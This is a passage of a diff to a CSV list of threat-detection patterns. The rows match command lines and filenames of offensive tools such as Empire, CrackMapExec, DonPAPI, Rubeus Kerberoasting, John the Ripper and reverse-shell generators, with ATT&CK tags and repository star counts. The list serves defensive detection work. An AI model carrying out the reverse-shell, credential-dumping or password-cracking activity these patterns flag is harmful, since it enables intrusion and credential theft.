number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -request -format hashcat -outputfile *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --requirement *Exegol/requirements.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "* -Reverse -IPAddress * -Port *","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2271","510","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" +"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST 
Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z" "* reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rfc868-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhost * -WARFile http*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Password * -Directory * -Dictionary *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Rhosts * -Path *.txt -Port *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* rid-hijack -*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* -rl 4 -ta 8 -t 2100 -an AS8560*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "* rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rockyou.txt *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* rockyou.txt 
*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "* ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "* rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1644,12 +1644,12 @@ "* rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"* --rules:Jumbo *","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* --rules:Jumbo *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 